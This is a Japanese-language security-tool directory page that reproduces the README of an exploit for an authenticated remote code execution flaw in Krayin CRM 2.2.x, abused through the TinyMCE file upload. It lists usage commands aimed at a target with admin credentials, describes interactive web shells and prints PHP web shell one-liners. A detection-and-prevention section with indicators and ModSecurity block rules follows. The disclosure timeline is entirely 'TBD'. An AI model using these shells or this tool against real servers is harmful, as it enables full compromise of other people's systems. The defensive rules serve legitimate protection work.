Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
KrayinCRM-RCE-Exploit-CVE-2026-38526 — CVE-2026-38526のKrayin CRM v2.2.x向けエクスプロイト - TinyMCEファイルアップロードバイパスを介した認証済みRCE。インタラクティブシェル、マルチタイプペイロード、自動シェル生成、および検証機能を備えています。作成者: Sudeepa Wanigarathna。許可されたテスト専用。 | Kitploit
ツール/GitHubGitHub/cerberusmrxi/krayincrm-rce-exploit-cve-2026-38526
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングシェルコード生成
GitHubcerberusmrxi/krayincrm-rce-exploit-cve-2026-38526

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

KrayinCRM-RCE-Exploit-CVE-2026-38526

CVE-2026-38526のKrayin CRM v2.2.x向けエクスプロイト - TinyMCEファイルアップロードバイパスを介した認証済みRCE。インタラクティブシェル、マルチタイプペイロード、自動シェル生成、および検証機能を備えています。作成者: Sudeepa Wanigarathna。許可されたテスト専用。

リポジトリを見る
3162ヶ月前未レビュー

🔓 Krayin CRM v2.2.x - 認証されたリモートコード実行エクスプロイト

License: MIT CVE-2026-38526

⚠️ 許可されたセキュリティテストのみ - 無許可の使用は違法かつ非倫理的です。

📋 概要

このエクスプロイトツールは、Krayin CRM バージョン 2.2.x で発見された重大な認証済みリモートコード実行 (RCE) 脆弱性を示しています。この脆弱性は TinyMCE ファイルアップロード機能に存在し、認証済み管理者がサーバー上で任意の PHP コードをアップロードおよび実行することを可能にします。

プロパティ値
CVE IDCVE-2026-38526
影響を受けるソフトウェアKrayin CRM v2.2.x
脆弱性タイプ認証済みリモートコード実行 (RCE)
認証の必要性はい (管理者レベルのアクセス)
影響システム全体の侵害
CVSS スコア8.8 (高)

🚨 脆弱性の詳細

脆弱性は、TinyMCE ファイルアップロードエンドポイント (/admin/tinymce/upload) での不十分なファイルタイプ検証に起因します。認証済み管理者は以下が可能です:

  • 画像 MIME タイプで偽装された PHP ファイルをアップロードします。
  • ファイルは Web からアクセス可能な場所に保存されます。
  • 攻撃者はサーバー上で任意の PHP コードを実行できます。

影響を受けるバージョン

  • Krayin CRM 2.2.0
  • Krayin CRM 2.2.1
  • Krayin CRM 2.2.2
  • パッチリリース前のすべての 2.2.x バージョン

✨ 機能

  • 複数のシェルタイプ: 基本、高度、最小、ファイルマネージャー、カスタム
  • 対話型シェル: コマンド履歴を備えた完全なターミナル風インターフェース
  • ファイルアップロード: シェルを介した追加ファイルのアップロード
  • CSRF トークン抽出: CSRF 保護の自動処理
  • プロキシサポート: HTTP/HTTPS プロキシ経由のルーティング
  • 柔軟な出力形式: テキスト、JSON、またはサイレントモード
  • リトライロジック: 接続失敗時の自動リトライ
  • カスタムヘッダー: カスタム HTTP ヘッダーのサポート
  • 冗長モード: 詳細なデバッグ出力
  • SSL サポート: オプションの SSL 証明書検証

📦 インストール

必要条件

  • bash
  • Python 3.7+
  • pip install httpx beautifulsoup4 colorama

クイックインストール

git clone https://github.com/CerberusMrXi/KrayinCRM-RCE-Exploit-CVE-2026-38526/.git
cd KrayinCRM-RCE-Exploit-CVE-2026-38526
pip install -r requirements.txt

必要条件ファイル (requirements.txt)

httpx>=0.24.0
beautifulsoup4>=4.12.0
colorama>=0.4.6

🚀 使い方

基本的なコマンド構文

python3 exploit.py -t <TARGET_URL> -u <USERNAME> -p <PASSWORD> [OPTIONS]

必須パラメータ

パラメータ説明
-t, --targetターゲット URL (例: http://192.168.1.100)
-u, --username管理者ユーザー名またはメール
-p, --password管理者パスワード

一般的な使用例

# Basic exploitation with generated shell
python3 exploit.py -t http://target.com -u [email protected] -p password

# Upload custom PHP shell file
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php

# Generate advanced shell with interactive mode
python3 exploit.py -t http://target.com -u [email protected] -p password --shell-type advanced -i

# Generate shell file without exploitation
python3 exploit.py -t http://target.com -u [email protected] -p password --generate-only --shell-type advanced -o my_shell.php

# Use with proxy for testing/debugging
python3 exploit.py -t http://target.com -u [email protected] -p password --proxy http://127.0.0.1:8080

# JSON output for automation
python3 exploit.py -t http://target.com -u [email protected] -p password -f shell.php -o json

# Verbose mode with custom timeout
python3 exploit.py -t http://target.com -u [email protected] -p password -v --timeout 60

# Custom User-Agent and headers
python3 exploit.py -t http://target.com -u [email protected] -p password --user-agent "CustomUA/1.0" --header "X-Forwarded-For: 127.0.0.1"

🐚 シェルタイプ

  1. 基本シェル (basic) system() 関数によるシンプルなコマンド実行。

    <?php if(isset($_REQUEST['cmd'])) { system($_REQUEST['cmd']); } ?>
    
  2. 高度なシェル (advanced) 豊富な機能を備えたシェル:

    • 複数のコマンド実行方式
    • 美しいターミナル風 Web インターフェース
    • コマンド履歴のサポート
    • 現在のユーザーとホスト名の表示
  3. 最小シェル (minimal) ステルス性のための最小フットプリント。

    <?php system($_GET["cmd"]); ?>
    
  4. ファイルマネージャー (file_manager) 完全なファイル管理インターフェース:

    • ファイルのアップロード
    • ファイルの削除
    • ディレクトリの作成
    • ナビゲーション
    • ファイルパーミッションビューア
  5. カスタムシェル (custom) 独自の PHP シェルファイルを -f パラメータで使用します。

📝 出力形式

テキスト形式 (デフォルト)

対話的使用に適した人間が読める色付き出力。

JSON 形式 (-o json)

自動化や統合のための機械可読形式。

{
  "success": true,
  "shell_url": "http://target.com/shell.php",
  "upload_url": "/storage/upload/shell.php",
  "message": "Upload successful",
  "timestamp": 1699123456.789,
  "details": {
    "status_code": 200,
    "response": "..."
  }
}

サイレント形式 (-q, --quiet)

エラー以外の出力を抑制。バッチ処理に便利。

⚙️ 高度なオプション

オプション説明デフォルト
--timeoutリクエストタイムアウト (秒)30
--retryリトライ回数3
--retry-delayリトライ間の遅延 (秒)2
--user-agentカスタム User-Agent 文字列デフォルトブラウザ UA
--headerカスタム HTTP ヘッダー (Key: Value)なし
--verify-sslSSL 証明書の検証False
--proxyHTTP/HTTPS プロキシ URLなし
-v, --verboseデバッグ出力を有効化False
-q, --quietすべての出力を抑制False

カスタムヘッダーの例

--header "X-Custom-Header: value" --header "User-Agent: CustomUA/1.0"

🔒 検出と防止

侵害の兆候 (IoC)

  • 監視すべきファイル:

    • public/storage/upload/ 内の異常な PHP ファイル
    • 二重拡張子を持つファイル (例: image.php.jpg)
    • 不審な名前の新しいファイル
  • 確認すべきログ:

    • /admin/tinymce/upload への POST リクエスト
    • 異常な管理者ログイン時間
    • 認証失敗の試行
  • システム指標:

    • 予期しないプロセスの実行
    • 新しい cron ジョブ
    • 変更されたシステムファイル

防止策

  • 即時対応:

    # Update to patched version
    composer update krayin/crm
    
    # Disable admin access temporarily
    # Remove unnecessary admin accounts
    # Change all admin passwords
    
  • ファイルアップロードの強化:

    // Validate file type by content, not just extension
    // Implement content security policy
    // Use Web Application Firewall (WAF)
    // Enable file upload scanning
    
  • アクセス制御:

    # Restrict admin IPs in .htaccess
    # Implement MFA for admin accounts
    # Regular admin audit
    # Session timeout policies
    
  • WAF ルール (ModSecurity):

    # Block suspicious file uploads
    SecRule FILES "\.(php|phtml|php[0-9])" "id:1001,deny,status:403,msg:'PHP file upload blocked'"
    
    # Block web shells
    SecRule ARGS "system|exec|shell_exec|passthru" "id:1002,deny,status:403,msg:'Shell command blocked'"
    

🛡️ 責任ある開示

この脆弱性は、責任あるセキュリティ研究を通じて発見されました。開示プロセスは以下の手順に従いました:

  • 発見: セキュリティ評価中に脆弱性を特定。
  • 検証: Krayin CRM 2.2.x での脆弱性を確認。
  • 報告: Krayin CRM 開発者に非公開で通知。
  • 連携: 修正の開発をチームと協力。
  • パッチ: 公式パッチリリースを待機中。
  • 開示: パッチ公開後に一般開示。

タイムライン

  • 発見: TBD
  • 報告: TBD
  • パッチ公開: TBD
  • 一般開示: TBD

📜 免責事項

THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESSED OR IMPLIED WARRANTIES, 
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 
THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 
EXEMPLARY, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY OUT OF THE USE 
OF THIS SOFTWARE.

USE OF THIS TOOL FOR ANY PURPOSE OTHER THAN AUTHORIZED SECURITY TESTING 
IS ILLEGAL AND UNETHICAL. THE AUTHOR TAKES NO RESPONSIBILITY FOR 
UNAUTHORIZED USE OR ANY DAMAGES CAUSED BY THIS TOOL.

🔧 トラブルシューティング

よくある問題

  • 問題: 認証に失敗する
    • 解決策: 資格情報を確認し、管理者ログインパスが /admin/login であることを確認
    • 確認: CSRF トークン抽出が正しく動作していることを確認
ツールをダウンロード